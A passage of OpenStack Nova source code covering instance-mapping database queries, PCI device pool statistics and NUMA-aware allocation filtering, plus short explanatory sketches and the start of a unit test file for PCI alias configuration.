LOG.warning('Encountered exception: "%s" while querying '
'instances from cell: %s. Continuing to the next '
'cell.', str(exp),
cms_by_id[cell_id].identity)
continue
# Walk through every instance that has a mapping needing to be updated
# and update it.
for instance in instances:
im = ims_by_inst_uuid.pop(instance.uuid)
im.user_id = instance.user_id
context.session.add(im)
done += 1
if ims_by_inst_uuid:
unmigratable_ims = True
if done >= max_count:
break
if unmigratable_ims:
LOG.warning('Some instance mappings were not migratable. This may '
'be transient due to in-flight instance builds, or could '
'be due to stale data that will be cleaned up after '
'running "nova-manage db archive_deleted_rows --purge".')
return found, done
@base.NovaObjectRegistry.register
class InstanceMappingList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Added get_by_cell_id method.
# Version 1.2: Added get_by_instance_uuids method
# Version 1.3: Added get_counts()
VERSION = '1.3'
fields = {
'objects': fields.ListOfObjectsField('InstanceMapping'),
}
@staticmethod
@api_db_api.context_manager.reader
def _get_by_project_id_from_db(context, project_id):
return context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.project_id == project_id).all()
@base.remotable_classmethod
def get_by_project_id(cls, context, project_id):
db_mappings = cls._get_by_project_id_from_db(context, project_id)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.reader
def _get_by_cell_id_from_db(context, cell_id):
return context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.cell_id == cell_id).all()
@base.remotable_classmethod
def get_by_cell_id(cls, context, cell_id):
db_mappings = cls._get_by_cell_id_from_db(context, cell_id)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.reader
def _get_by_instance_uuids_from_db(context, uuids):
return context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.instance_uuid.in_(uuids))\
.all()
@base.remotable_classmethod
def get_by_instance_uuids(cls, context, uuids):
db_mappings = cls._get_by_instance_uuids_from_db(context, uuids)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.writer
def _destroy_bulk_in_db(context, instance_uuids):
return context.session.query(api_models.InstanceMapping).filter(
api_models.InstanceMapping.instance_uuid.in_(instance_uuids)).\
delete(synchronize_session=False)
@classmethod
def destroy_bulk(cls, context, instance_uuids):
return cls._destroy_bulk_in_db(context, instance_uuids)
@staticmethod
@api_db_api.context_manager.reader
def _get_not_deleted_by_cell_and_project_from_db(context, cell_uuid,
project_id, limit):
query = context.session.query(api_models.InstanceMapping)
if project_id is not None:
# Note that the project_id can be None in case
# instances are being listed for the all-tenants case.
query = query.filter_by(project_id=project_id)
# Both the values NULL (for cases when the online data migration for
# queued_for_delete was not run) and False (cases when the online
# data migration for queued_for_delete was run) are assumed to mean
# that the instance is not queued for deletion.
query = query.filter(
sql.or_(
api_models.InstanceMapping.queued_for_delete == sql.false(),
api_models.InstanceMapping.queued_for_delete.is_(None)
)
).join(
api_models.InstanceMapping.cell_mapping
).options(
orm.joinedload(api_models.InstanceMapping.cell_mapping)
).filter(api_models.CellMapping.uuid == cell_uuid)
if limit is not None:
query = query.limit(limit)
return query.all()
@classmethod
def get_not_deleted_by_cell_and_project(cls, context, cell_uuid,
project_id, limit=None):
"""Return a limit restricted list of InstanceMapping objects which are
mapped to the specified cell_uuid, belong to the specified
project_id and are not queued for deletion (note that unlike the other
InstanceMappingList query methods which return all mappings
irrespective of whether they are queued for deletion this method
explicitly queries only for those mappings that are *not* queued for
deletion as is evident from the naming of the method).
"""
db_mappings = cls._get_not_deleted_by_cell_and_project_from_db(
context, cell_uuid, project_id, limit)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.reader
def _get_counts_in_db(context, project_id, user_id=None):
project_query = context.session.query(
func.count(api_models.InstanceMapping.id)).\
filter_by(queued_for_delete=False).\
filter_by(project_id=project_id)
project_result = project_query.scalar()
counts = {'project': {'instances': project_result}}
if user_id:
user_result = project_query.filter_by(user_id=user_id).scalar()
counts['user'] = {'instances': user_result}
return counts
@base.remotable_classmethod
def get_counts(cls, context, project_id, user_id=None):
"""Get the counts of InstanceMapping objects in the database.
The count is used to represent the count of instances for the purpose
        of counting quota usage. Instances that are queued_for_delete=True are
        not included in the count (deleted and SOFT_DELETED instances).
        Instances that are queued_for_delete=None are not included in the
count because we are not certain about whether or not they are deleted.
:param context: The request context for database access
:param project_id: The project_id to count across
:param user_id: The user_id to count across
:returns: A dict containing the project-scoped counts and user-scoped
counts if user_id is specified. For example:
{'project': {'instances': <count across project>},
'user': {'instances': <count across user>}}
"""
return cls._get_counts_in_db(context, project_id, user_id=user_id)
@staticmethod
@api_db_api.context_manager.reader
def _get_count_by_uuids_and_user_in_db(context, uuids, user_id):
query = (context.session.query(
func.count(api_models.InstanceMapping.id))
.filter(api_models.InstanceMapping.instance_uuid.in_(uuids))
.filter_by(queued_for_delete=False)
.filter_by(user_id=user_id))
return query.scalar()
@classmethod
def get_count_by_uuids_and_user(cls, context, uuids, user_id):
"""Get the count of InstanceMapping objects by UUIDs and user_id.
The count is used to represent the count of server group members
belonging to a particular user, for the purpose of counting quota
        usage. Instances that are queued_for_delete=True are not included in
the count (deleted and SOFT_DELETED instances).
:param uuids: List of instance UUIDs on which to filter
:param user_id: The user_id on which to filter
:returns: An integer for the count
"""
return cls._get_count_by_uuids_and_user_in_db(context, uuids, user_id)
```
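The `obj_make_compatible` hook above is how versioned objects stay consumable by older services: any field newer than the requested target version is stripped from the serialized primitive before it is sent. A minimal standalone sketch of the idea (field names and version tuples are illustrative):
```python
def make_compatible(primitive, target_version, introduced_in):
    """Drop fields newer than target_version from a serialized primitive.

    introduced_in maps each optional field to the (major, minor) version
    that added it, mirroring the version history comments kept on the
    object class.
    """
    for field, version in introduced_in.items():
        if target_version < version and field in primitive:
            del primitive[field]
    return primitive


prim = {'instance_uuid': 'abc', 'queued_for_delete': False, 'user_id': 'u1'}
make_compatible(prim, (1, 0),
                {'queued_for_delete': (1, 1), 'user_id': (1, 2)})
assert prim == {'instance_uuid': 'abc'}
```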
#### File: nova/pci/stats.py
```python
import copy
import typing as ty
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import strutils
from nova import exception
from nova import objects
from nova.objects import fields
from nova.objects import pci_device_pool
from nova.pci.request import PCI_REMOTE_MANAGED_TAG
from nova.pci import utils
from nova.pci import whitelist
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# TODO(stephenfin): We might want to use TypedDict here. Refer to
# https://mypy.readthedocs.io/en/latest/kinds_of_types.html#typeddict for
# more information.
Pool = ty.Dict[str, ty.Any]
class PciDeviceStats(object):
"""PCI devices summary information.
According to the PCI SR-IOV spec, a PCI physical function can have up to
256 PCI virtual functions, thus the number of assignable PCI functions in
a cloud can be big. The scheduler needs to know all device availability
information in order to determine which compute hosts can support a PCI
request. Passing individual virtual device information to the scheduler
does not scale, so we provide summary information.
Usually the virtual functions provided by a host PCI device have the same
value for most properties, like vendor_id, product_id and class type.
The PCI stats class summarizes this information for the scheduler.
    The pci stats information is maintained exclusively by the compute node
    resource tracker and persisted to the database. The scheduler fetches the
    information and selects the compute node accordingly. If a compute
    node is selected, the resource tracker allocates the devices to the
    instance and updates the pci stats information.
    This summary information is also helpful for cloud management.
"""
pool_keys = ['product_id', 'vendor_id', 'numa_node', 'dev_type']
def __init__(
self,
numa_topology: 'objects.NUMATopology',
stats: 'objects.PCIDevicePoolList' = None,
dev_filter: whitelist.Whitelist = None,
) -> None:
self.numa_topology = numa_topology
self.pools = (
[pci_pool.to_dict() for pci_pool in stats] if stats else []
)
        self.pools.sort(key=len)
self.dev_filter = dev_filter or whitelist.Whitelist(
CONF.pci.passthrough_whitelist)
def _equal_properties(
self, dev: Pool, entry: Pool, matching_keys: ty.List[str],
) -> bool:
return all(dev.get(prop) == entry.get(prop)
for prop in matching_keys)
def _find_pool(self, dev_pool: Pool) -> ty.Optional[Pool]:
"""Return the first pool that matches dev."""
for pool in self.pools:
pool_keys = pool.copy()
del pool_keys['count']
del pool_keys['devices']
            if (len(pool_keys) == len(dev_pool) and
                    self._equal_properties(dev_pool, pool_keys, list(dev_pool))):
return pool
return None
@staticmethod
def _ensure_remote_managed_tag(
dev: 'objects.PciDevice', pool: Pool):
"""Add a remote_managed tag depending on a device type if needed.
Network devices may be managed remotely, e.g. by a SmartNIC DPU. If
a tag has not been explicitly provided, populate it by assuming that
a device is not remote managed by default.
"""
if dev.dev_type not in (fields.PciDeviceType.SRIOV_VF,
fields.PciDeviceType.SRIOV_PF,
fields.PciDeviceType.VDPA):
return
# A tag is added here rather than at the client side to avoid an
# issue with having objects without this tag specified during an
# upgrade to the first version that supports handling this tag.
if pool.get(PCI_REMOTE_MANAGED_TAG) is None:
# NOTE: tags are compared as strings case-insensitively, see
# pci_device_prop_match in nova/pci/utils.py.
pool[PCI_REMOTE_MANAGED_TAG] = 'false'
def _create_pool_keys_from_dev(
self, dev: 'objects.PciDevice',
) -> ty.Optional[Pool]:
"""Create a stats pool dict that this dev is supposed to be part of
Note that this pool dict contains the stats pool's keys and their
values. 'count' and 'devices' are not included.
"""
# Don't add a device that doesn't have a matching device spec.
# This can happen during initial sync up with the controller
devspec = self.dev_filter.get_devspec(dev)
if not devspec:
return None
tags = devspec.get_tags()
pool = {k: getattr(dev, k) for k in self.pool_keys}
if tags:
pool.update(tags)
# NOTE(gibi): parent_ifname acts like a tag during pci claim but
# not provided as part of the whitelist spec as it is auto detected
# by the virt driver.
        # This key is used to match InstancePciRequests backed by neutron
        # ports that have a resource_request and therefore already have a
        # resource allocation in placement.
if dev.extra_info.get('parent_ifname'):
pool['parent_ifname'] = dev.extra_info['parent_ifname']
self._ensure_remote_managed_tag(dev, pool)
return pool
def _get_pool_with_device_type_mismatch(
self, dev: 'objects.PciDevice',
) -> ty.Optional[ty.Tuple[Pool, 'objects.PciDevice']]:
"""Check for device type mismatch in the pools for a given device.
Return (pool, device) if device type does not match or a single None
if the device type matches.
"""
for pool in self.pools:
for device in pool['devices']:
if device.address == dev.address:
if dev.dev_type != pool["dev_type"]:
return pool, device
return None
return None
def update_device(self, dev: 'objects.PciDevice') -> None:
"""Update a device to its matching pool."""
pool_device_info = self._get_pool_with_device_type_mismatch(dev)
if pool_device_info is None:
return None
pool, device = pool_device_info
pool['devices'].remove(device)
self._decrease_pool_count(self.pools, pool)
self.add_device(dev)
def add_device(self, dev: 'objects.PciDevice') -> None:
"""Add a device to its matching pool."""
dev_pool = self._create_pool_keys_from_dev(dev)
if dev_pool:
pool = self._find_pool(dev_pool)
if not pool:
dev_pool['count'] = 0
dev_pool['devices'] = []
self.pools.append(dev_pool)
                self.pools.sort(key=len)
pool = dev_pool
pool['count'] += 1
pool['devices'].append(dev)
@staticmethod
def _decrease_pool_count(
pool_list: ty.List[Pool], pool: Pool, count: int = 1,
) -> int:
"""Decrement pool's size by count.
If pool becomes empty, remove pool from pool_list.
"""
if pool['count'] > count:
pool['count'] -= count
count = 0
else:
count -= pool['count']
pool_list.remove(pool)
return count
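    # Worked example (hypothetical numbers): with pool['count'] == 3 and
    # count == 5 the pool is drained and removed from pool_list, and 2 is
    # returned so a caller could keep decrementing against another pool;
    # with pool['count'] == 3 and count == 1 the pool shrinks to 2 and 0
    # is returned.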
def remove_device(self, dev: 'objects.PciDevice') -> None:
"""Remove one device from the first pool that it matches."""
dev_pool = self._create_pool_keys_from_dev(dev)
if dev_pool:
pool = self._find_pool(dev_pool)
if not pool:
raise exception.PciDevicePoolEmpty(
compute_node_id=dev.compute_node_id, address=dev.address)
pool['devices'].remove(dev)
self._decrease_pool_count(self.pools, pool)
def get_free_devs(self) -> ty.List['objects.PciDevice']:
free_devs: ty.List[objects.PciDevice] = []
for pool in self.pools:
free_devs.extend(pool['devices'])
return free_devs
def consume_requests(
self,
pci_requests: 'objects.InstancePCIRequests',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> ty.Optional[ty.List['objects.PciDevice']]:
alloc_devices: ty.List[objects.PciDevice] = []
for request in pci_requests:
count = request.count
pools = self._filter_pools(self.pools, request, numa_cells)
# Failed to allocate the required number of devices. Return the
# devices already allocated during previous iterations back to
# their pools
if not pools:
LOG.error("Failed to allocate PCI devices for instance. "
"Unassigning devices back to pools. "
"This should not happen, since the scheduler "
"should have accurate information, and allocation "
"during claims is controlled via a hold "
"on the compute node semaphore.")
                for _ in range(len(alloc_devices)):
self.add_device(alloc_devices.pop())
return None
for pool in pools:
if pool['count'] >= count:
num_alloc = count
else:
num_alloc = pool['count']
count -= num_alloc
pool['count'] -= num_alloc
                for _ in range(num_alloc):
pci_dev = pool['devices'].pop()
self._handle_device_dependents(pci_dev)
pci_dev.request_id = request.request_id
alloc_devices.append(pci_dev)
if count == 0:
break
return alloc_devices
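    # Note on consume_requests above: the pools surviving the filters are
    # drained in order until each request's count is met; an empty filtered
    # pool list rolls back every device claimed so far in this call and
    # signals failure by returning None.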
def _handle_device_dependents(self, pci_dev: 'objects.PciDevice') -> None:
"""Remove device dependents or a parent from pools.
        In case the device is a PF, all of its dependent VFs should
        be removed from the pool counts, if present.
        When the device is a VF or a VDPA device, its parent PF's
        pool count should be decreased, unless it is no longer in a pool.
"""
if pci_dev.dev_type == fields.PciDeviceType.SRIOV_PF:
vfs_list = pci_dev.child_devices
if vfs_list:
free_devs = self.get_free_devs()
for vf in vfs_list:
                    # NOTE(gibi): do not try to remove a device that has
                    # already been removed
if vf in free_devs:
self.remove_device(vf)
elif pci_dev.dev_type in (
fields.PciDeviceType.SRIOV_VF,
fields.PciDeviceType.VDPA,
):
try:
parent = pci_dev.parent_device
# Make sure not to decrease PF pool count if this parent has
# been already removed from pools
if parent in self.get_free_devs():
self.remove_device(parent)
except exception.PciDeviceNotFound:
return
def _filter_pools_for_spec(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools that don't match the request's device spec.
Exclude pools that do not match the specified ``vendor_id``,
``product_id`` and/or ``device_type`` field, or any of the other
arbitrary tags such as ``physical_network``, specified in the request.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
request_specs = request.spec
return [
pool for pool in pools
if utils.pci_device_prop_match(pool, request_specs)
]
def _filter_pools_for_numa_cells(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.List[Pool]:
"""Filter out pools with the wrong NUMA affinity, if required.
Exclude pools that do not have *suitable* PCI NUMA affinity.
``numa_policy`` determines what *suitable* means, being one of
PREFERRED (nice-to-have), LEGACY (must-have-if-available) and REQUIRED
(must-have). We iterate through the various policies in order of
strictness. This means that even if we only *prefer* PCI-NUMA affinity,
we will still attempt to provide it if possible.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells.
:returns: A list of pools that can, together, provide at least
``requested_count`` PCI devices with the level of NUMA affinity
required by ``numa_policy``, else all pools that can satisfy this
policy even if it's not enough.
"""
if not numa_cells:
return pools
# we default to the 'legacy' policy for...of course...legacy reasons
requested_policy = fields.PCINUMAAffinityPolicy.LEGACY
if 'numa_policy' in request:
requested_policy = request.numa_policy or requested_policy
requested_count = request.count
numa_cell_ids = [cell.id for cell in numa_cells]
        # filter out pools whose numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# we can't apply a less strict policy than the one requested, so we
# need to return if we've demanded a NUMA affinity of REQUIRED.
# However, NUMA affinity is a good thing. If we can get enough devices
# with the stricter policy then we will use them.
if requested_policy == fields.PCINUMAAffinityPolicy.REQUIRED or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# the SOCKET policy is a bit of a special case. It's less strict than
# REQUIRED (so REQUIRED will automatically fulfil SOCKET, at least
# with our assumption of never having multiple sockets per NUMA node),
# but not always more strict than LEGACY: a PCI device with no NUMA
# affinity will fulfil LEGACY but not SOCKET. If we have SOCKET,
# process it here and don't continue.
if requested_policy == fields.PCINUMAAffinityPolicy.SOCKET:
return self._filter_pools_for_socket_affinity(pools, numa_cells)
# some systems don't report NUMA node info for PCI devices, in which
# case None is reported in 'pci_device.numa_node'. The LEGACY policy
# allows us to use these devices so we include None in the list of
# suitable NUMA cells.
numa_cell_ids.append(None)
        # filter out pools whose numa_node is not included in numa_cell_ids
filtered_pools = [
pool for pool in pools if any(utils.pci_device_prop_match(
pool, [{'numa_node': cell}]) for cell in numa_cell_ids)]
# once again, we can't apply a less strict policy than the one
# requested, so we need to return if we've demanded a NUMA affinity of
# LEGACY. Similarly, we will also return if we have enough devices to
# satisfy this somewhat strict policy.
if requested_policy == fields.PCINUMAAffinityPolicy.LEGACY or sum(
pool['count'] for pool in filtered_pools) >= requested_count:
return filtered_pools
# if we've got here, we're using the PREFERRED policy and weren't able
# to provide anything with stricter affinity. Use whatever devices you
# can, folks.
return sorted(
pools, key=lambda pool: pool.get('numa_node') not in numa_cell_ids)
def _filter_pools_for_socket_affinity(
self,
pools: ty.List[Pool],
numa_cells: ty.List['objects.InstanceNUMACell'],
) -> ty.List[Pool]:
host_cells = self.numa_topology.cells
# bail early if we don't have socket information for all host_cells.
        # This could happen if we're running on a weird older system with
# multiple sockets per NUMA node, which is a configuration that we
# explicitly chose not to support.
if any(cell.socket is None for cell in host_cells):
LOG.debug('No socket information in host NUMA cell(s).')
return []
# get a set of host sockets that the guest cells are in. Since guest
        # cell IDs map to host cell IDs, we can just look up the latter's
# socket.
socket_ids = set()
for guest_cell in numa_cells:
for host_cell in host_cells:
if guest_cell.id == host_cell.id:
socket_ids.add(host_cell.socket)
# now get a set of host NUMA nodes that are in the above sockets
allowed_numa_nodes = set()
for host_cell in host_cells:
if host_cell.socket in socket_ids:
allowed_numa_nodes.add(host_cell.id)
# filter out pools that are not in one of the correct host NUMA nodes.
return [
pool for pool in pools if any(
utils.pci_device_prop_match(pool, [{'numa_node': numa_node}])
for numa_node in allowed_numa_nodes
)
]
def _filter_pools_for_unrequested_pfs(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with PFs, unless these are required.
        This is necessary in cases where PFs and VFs have the same product_id,
        and is generally useful elsewhere.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.SRIOV_PF
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.SRIOV_PF
]
return pools
def _filter_pools_for_unrequested_vdpa_devices(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with VDPA devices, unless these are required.
This is necessary as vdpa devices require special handling and
should not be allocated to generic pci device requests.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(
spec.get('dev_type') != fields.PciDeviceType.VDPA
for spec in request.spec
):
pools = [
pool for pool in pools
if not pool.get('dev_type') == fields.PciDeviceType.VDPA
]
return pools
def _filter_pools_for_unrequested_remote_managed_devices(
self, pools: ty.List[Pool], request: 'objects.InstancePCIRequest',
) -> ty.List[Pool]:
"""Filter out pools with remote_managed devices, unless requested.
Remote-managed devices are not usable for legacy SR-IOV or hardware
offload scenarios and must be excluded from allocation.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:returns: A list of pools that can be used to support the request if
this is possible.
"""
if all(not strutils.bool_from_string(spec.get(PCI_REMOTE_MANAGED_TAG))
for spec in request.spec):
pools = [pool for pool in pools
if not strutils.bool_from_string(
pool.get(PCI_REMOTE_MANAGED_TAG))]
return pools
def _filter_pools(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']],
) -> ty.Optional[ty.List[Pool]]:
"""Determine if an individual PCI request can be met.
Filter pools, which are collections of devices with similar traits, to
identify those that can support the provided PCI request.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``request.numa_policy``.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACell objects.
:returns: A list of pools that can be used to support the request if
this is possible, else None.
"""
        # NOTE(vladikr): This code may be open to race conditions.
        # Two concurrent requests may both succeed when calling
        # support_requests, because this method does not remove the related
        # devices from the pools.
# Firstly, let's exclude all devices that don't match our spec (e.g.
# they've got different PCI IDs or something)
before_count = sum([pool['count'] for pool in pools])
pools = self._filter_pools_for_spec(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) due to mismatched PCI attribute(s)',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# Next, let's exclude all devices that aren't on the correct NUMA node
# or socket, *assuming* we have devices and care about that, as
# determined by policy
before_count = after_count
pools = self._filter_pools_for_numa_cells(pools, request, numa_cells)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are on the wrong NUMA node(s)',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# If we're not requesting PFs then we should not use these.
# Exclude them.
before_count = after_count
pools = self._filter_pools_for_unrequested_pfs(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are PFs which we have not '
'requested',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
# If we're not requesting VDPA devices then we should not use these
# either. Exclude them.
before_count = after_count
pools = self._filter_pools_for_unrequested_vdpa_devices(pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
'Dropped %d device(s) as they are VDPA devices which we have '
'not requested',
before_count - after_count
)
# If we're not requesting remote_managed devices then we should not
# use these either. Exclude them.
before_count = after_count
pools = self._filter_pools_for_unrequested_remote_managed_devices(
pools, request)
after_count = sum([pool['count'] for pool in pools])
if after_count < before_count:
LOG.debug(
                'Dropped %d device(s) as they are remote-managed devices '
                'which we have not requested',
before_count - after_count
)
if after_count < request.count:
LOG.debug('Not enough PCI devices left to satisfy request')
return None
return pools
def support_requests(
self,
requests: ty.List['objects.InstancePCIRequest'],
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> bool:
"""Determine if the PCI requests can be met.
Determine, based on a compute node's PCI stats, if an instance can be
scheduled on the node. **Support does not mean real allocation**.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``numa_policy``.
:param requests: A list of InstancePCIRequest object describing the
types, quantities and required NUMA affinities of devices we want.
:type requests: nova.objects.InstancePCIRequests
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells, or None.
:returns: Whether this compute node can satisfy the given request.
"""
        # NOTE(yjiang5): this function is very likely to fail, so for
        # performance reasons no exception should be raised here.
return all(
self._filter_pools(self.pools, r, numa_cells) for r in requests
)
def _apply_request(
self,
pools: ty.List[Pool],
request: 'objects.InstancePCIRequest',
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> bool:
"""Apply an individual PCI request.
Apply a PCI request against a given set of PCI device pools, which are
collections of devices with similar traits.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``request.numa_policy``.
:param pools: A list of PCI device pool dicts
:param request: An InstancePCIRequest object describing the type,
quantity and required NUMA affinity of device(s) we want.
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACell objects.
:returns: True if the request was applied against the provided pools
successfully, else False.
"""
        # NOTE(vladikr): This code may be open to race conditions.
        # Two concurrent requests may both succeed when calling
        # support_requests, because this method does not remove the related
        # devices from the pools.
filtered_pools = self._filter_pools(pools, request, numa_cells)
if not filtered_pools:
return False
count = request.count
for pool in filtered_pools:
count = self._decrease_pool_count(pools, pool, count)
if not count:
break
return True
def apply_requests(
self,
requests: ty.List['objects.InstancePCIRequest'],
numa_cells: ty.Optional[ty.List['objects.InstanceNUMACell']] = None,
) -> None:
"""Apply PCI requests to the PCI stats.
This is used in multiple instance creation, when the scheduler has to
maintain how the resources are consumed by the instances.
If ``numa_cells`` is provided then NUMA locality may be taken into
account, depending on the value of ``numa_policy``.
:param requests: A list of InstancePCIRequest object describing the
types, quantities and required NUMA affinities of devices we want.
:type requests: nova.objects.InstancePCIRequests
:param numa_cells: A list of InstanceNUMACell objects whose ``id``
corresponds to the ``id`` of host NUMACells, or None.
:raises: exception.PciDeviceRequestFailed if this compute node cannot
satisfy the given request.
"""
if not all(
self._apply_request(self.pools, r, numa_cells) for r in requests
):
raise exception.PciDeviceRequestFailed(requests=requests)
def __iter__(self) -> ty.Iterator[Pool]:
pools: ty.List[Pool] = []
for pool in self.pools:
pool = copy.deepcopy(pool)
# 'devices' shouldn't be part of stats
if 'devices' in pool:
del pool['devices']
pools.append(pool)
return iter(pools)
def clear(self) -> None:
"""Clear all the stats maintained."""
self.pools = []
def __eq__(self, other: object) -> bool:
if not isinstance(other, PciDeviceStats):
return NotImplemented
return self.pools == other.pools
def to_device_pools_obj(self) -> 'objects.PciDevicePoolList':
"""Return the contents of the pools as a PciDevicePoolList object."""
stats = [x for x in self]
return pci_device_pool.from_pci_stats(stats)
def has_remote_managed_device_pools(self) -> bool:
"""Determine whether remote managed device pools are present on a host.
        The check is pool-based, not free-device-based, and is NUMA cell
        agnostic.
"""
dummy_req = objects.InstancePCIRequest(
count=0,
spec=[{'remote_managed': True}]
)
pools = self._filter_pools_for_spec(self.pools, dummy_req)
return bool(pools)
```
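The filtering and allocation flow above is easier to see in isolation. Below is a minimal, self-contained sketch of the same pattern on plain dicts — match pools against a spec, then consume counts until the request is satisfied. The helpers `prop_match`, `filter_pools_for_spec` and `apply_request` are simplified stand-ins for Nova's `pci_device_prop_match` and the `_filter_pools`/`_apply_request` methods, not the real API:
```python
# Minimal sketch of spec-based pool filtering and count consumption,
# using plain dicts instead of Nova's Pool/InstancePCIRequest objects.

def prop_match(pool, specs):
    # A pool matches if all key/value pairs of at least one spec are present.
    return any(all(pool.get(k) == v for k, v in spec.items())
               for spec in specs)

def filter_pools_for_spec(pools, specs):
    return [pool for pool in pools if prop_match(pool, specs)]

def apply_request(pools, specs, count):
    # Consume `count` devices from matching pools; True on success.
    matching = filter_pools_for_spec(pools, specs)
    if sum(pool['count'] for pool in matching) < count:
        return False
    for pool in matching:
        taken = min(pool['count'], count)
        pool['count'] -= taken
        count -= taken
        if count == 0:
            break
    return True

pools = [
    {'vendor_id': '8086', 'product_id': '1111', 'count': 2},
    {'vendor_id': '8086', 'product_id': '4443', 'count': 3},
]
assert apply_request(pools, [{'vendor_id': '8086', 'product_id': '4443'}], 2)
assert pools[1]['count'] == 1
```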
#### File: unit/pci/test_request.py
```python
import mock
from oslo_serialization import jsonutils
from oslo_utils.fixture import uuidsentinel
from nova import context
from nova import exception
from nova.network import model
from nova import objects
from nova.objects import fields
from nova.pci import request
from nova import test
from nova.tests.unit.api.openstack import fakes
_fake_alias1 = jsonutils.dumps({
"name": "QuickAssist",
"capability_type": "pci",
"product_id": "4443",
"vendor_id": "8086",
"device_type": "type-PCI",
"numa_policy": "legacy",
})
_fake_alias2 = jsonutils.dumps({
"name": "IntelNIC",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PF",
})
class PciRequestTestCase(test.NoDBTestCase):
@staticmethod
def _create_fake_inst_with_pci_devs(pci_req_list, pci_dev_list):
"""Create a fake Instance object with the provided InstancePciRequests
and PciDevices.
:param pci_req_list: a list of InstancePCIRequest objects.
:param pci_dev_list: a list of PciDevice objects, each element
            associated (via the request_id attribute) with a corresponding
element from pci_req_list.
:return: A fake Instance object associated with the provided
PciRequests and PciDevices.
"""
inst = objects.Instance()
inst.uuid = uuidsentinel.instance1
inst.pci_requests = objects.InstancePCIRequests(
requests=pci_req_list)
inst.pci_devices = objects.PciDeviceList(objects=pci_dev_list)
inst.host = 'fake-host'
inst.node = 'fake-node'
return inst
def setUp(self):
super(PciRequestTestCase, self).setUp()
self.context = context.RequestContext(fakes.FAKE_USER_ID,
fakes.FAKE_PROJECT_ID)
def test_get_alias_from_config_valid(self):
self.flags(alias=[_fake_alias1], group='pci')
result = request._get_alias_from_config()
expected_result = (
'legacy',
[{
"capability_type": "pci",
"product_id": "4443",
"vendor_id": "8086",
"dev_type": "type-PCI",
}])
self.assertEqual(expected_result, result['QuickAssist'])
def test_get_alias_from_config_valid_multispec(self):
_fake_alias = jsonutils.dumps({
"name": "QuickAssist",
"capability_type": "pci",
"product_id": "4444",
"vendor_id": "8086",
"device_type": "type-PCI",
})
self.flags(alias=[_fake_alias1, _fake_alias], group='pci')
result = request._get_alias_from_config()
expected_result = (
'legacy',
[{
